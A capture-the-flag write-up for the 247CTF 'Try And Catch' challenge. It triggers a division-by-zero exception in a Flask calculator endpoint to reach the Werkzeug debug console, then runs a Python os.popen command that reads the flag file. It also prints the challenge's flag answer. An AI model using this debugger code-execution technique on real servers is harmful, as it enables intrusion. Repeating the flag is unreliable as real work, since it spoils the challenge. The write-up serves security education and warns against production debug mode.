247CTF - Try And Catch

Find a bug and trigger an exception in a Flask web application to access the debug console.

Vulnerability

Flask debug mode with DebuggedApplication and evalex=True allows interactive code execution through the debugger console. The calculator endpoint accepts division operations and lacks proper exception handling.

Solution

Step 1: Trigger an Exception

Send a division by zero request to the calculator:

1
https://9894a61910fb83f2.247ctf.com/calculator?number_1=1&number_2=0&operation=%2f

Step 2: Execute Arbitrary Python

The debug console opens. Execute commands to read the flag:

1
2
>>> __import__('os').popen('cat ./flag.txt').read()
'247CTF{0e310979093ef6309adcbcb418145200}\n'

Key Insight

Never enable Flask debug mode in production. The Werkzeug debugger with evalex=True provides a complete interactive Python console, allowing arbitrary code execution with the web server's privileges.

247CTF{0e310979093ef6309adcbcb418145200}